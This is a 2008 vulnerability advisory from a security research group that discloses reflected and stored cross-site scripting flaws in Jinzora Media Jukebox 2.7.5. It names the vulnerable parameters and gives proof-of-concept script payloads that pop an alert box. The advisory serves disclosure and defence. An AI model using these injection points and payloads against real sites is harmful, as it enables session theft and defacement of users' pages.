Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-016


Application:                    Jinzora Media Jukebox
Versions Affected:              2.7.5
Vendor URL:                     http://www.jinzora.com/
Bugs:                           Multiple XSS Injections
Exploits:                       YES
Reported:                       04.02.2008
Second report:                  12.02.2008
Vendor response:                NONE
Date of Public Advisory:        19.02.2008
Authors:                        Alexandr Polyakov, Stas Svistunovich
                                Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Jinzora system has multiple security vulnerabilities:

1. Linked XSS
2. Stored XSS



Details
*******

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string.


1.1 Linked XSS vulnerabiliies found in index.php.

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC="javascript:alert('DSecRG XSS')">


1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

Example:

http://[server]/[installdir]/ajax_request.php?language=<IMG SRC="javascript:alert('DSecRG XSS')">


1.3 Linked XSS vulnerability found in slim.php. GET parameter "jz_path".

Example:

http://[server]/[installdir]/slim.php?jz_path=<IMG SRC="javascript:alert('DSecRG XSS')">


1.4 Linked XSS vulnerabilities found in popup.php.

GET parameters "frontend", "theme", "jz_path".

Example:

http://[server]/[installdir]/popup.php?theme=<IMG SRC="javascript:alert('DSecRG XSS')">


1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/"><script>alert('DSecRG XSS')</script>

---------------------------------------------------------------------


2. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter name "siteNewsData" 

Example:

siteNewsData = </textarea><script>alert('DSecRG XSS')</script>


2.1 Vulnerability found in script popup.php?ptype=playlistedit in post parameter name "query" 

Example:

query = <script>alert('DSecRG XSS')</script>





About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsec.ru (in Russian)


-- 

  Digital Security Research Group  mailto:research@dsec.ru